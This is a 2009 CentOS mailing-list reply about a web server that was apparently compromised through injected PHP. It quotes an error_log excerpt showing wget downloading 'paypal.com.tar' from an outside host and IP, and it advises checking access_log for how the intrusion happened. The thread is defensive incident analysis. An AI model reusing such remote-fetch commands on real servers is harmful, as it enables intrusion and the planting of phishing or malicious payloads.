[CentOS] httpd - mysql - paypal.com.tar - hacker
John R Pierce
pierce at hogranch.com
Fri Aug 21 21:20:38 UTC 2009
Gregory P. Ennis wrote:
> P.S. I found the following entry in my error_log of /var/log/httpd/ :
>
> [Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39
> --00:21:14-- http://code.go.ro/paypal.com.tar
> Resolving code.go.ro... 81.196.20.134
> Connecting to code.go.ro|81.196.20.134|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 645120 (630K) [application/x-tar]
> Saving to: `paypal.com.tar'
>
....
looks like they spoofed something on your server, probably some kinda
sloppy php, into running wget. I'd take a look at the access_log
around the same timestamp to see if there any hints as to how they did this.
http://xkcd.com/327/
More information about the CentOS
mailing list